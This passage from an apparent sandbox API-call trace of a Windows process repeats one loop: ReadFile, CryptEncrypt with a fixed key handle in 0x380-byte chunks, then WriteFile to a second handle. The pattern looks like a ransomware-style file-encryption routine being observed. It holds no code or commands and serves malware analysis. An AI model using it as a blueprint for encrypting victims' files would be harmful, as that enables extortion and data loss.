lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.581] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.581] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.581] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.581] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.581] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.581] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.582] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.582] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.582] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.582] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.582] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.582] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.582] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.582] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.582] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.582] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.582] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.582] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.582] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.582] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.582] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.582] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.582] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.582] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.583] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.583] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.583] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.583] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.583] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.583] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.583] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.583] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.583] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.584] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.584] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.584] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.584] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.584] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.584] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.584] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.584] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.584] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.584] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.584] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.584] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.584] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.584] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.585] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.585] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.585] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.585] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.585] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.585] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.585] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.585] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.585] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.585] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.585] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.585] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.585] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.585] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.586] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.586] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.586] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.586] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.586] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.586] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.586] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.586] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.586] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.586] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.586] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.586] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.586] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.586] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.587] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.587] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.587] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.587] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.587] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.587] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.587] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.587] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.587] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.587] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.587] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.587] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.587] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.587] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.587] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.587] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.588] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.588] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.588] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.588] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.588] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.588] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.588] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.588] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.588] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.588] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.588] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.588] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.591] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 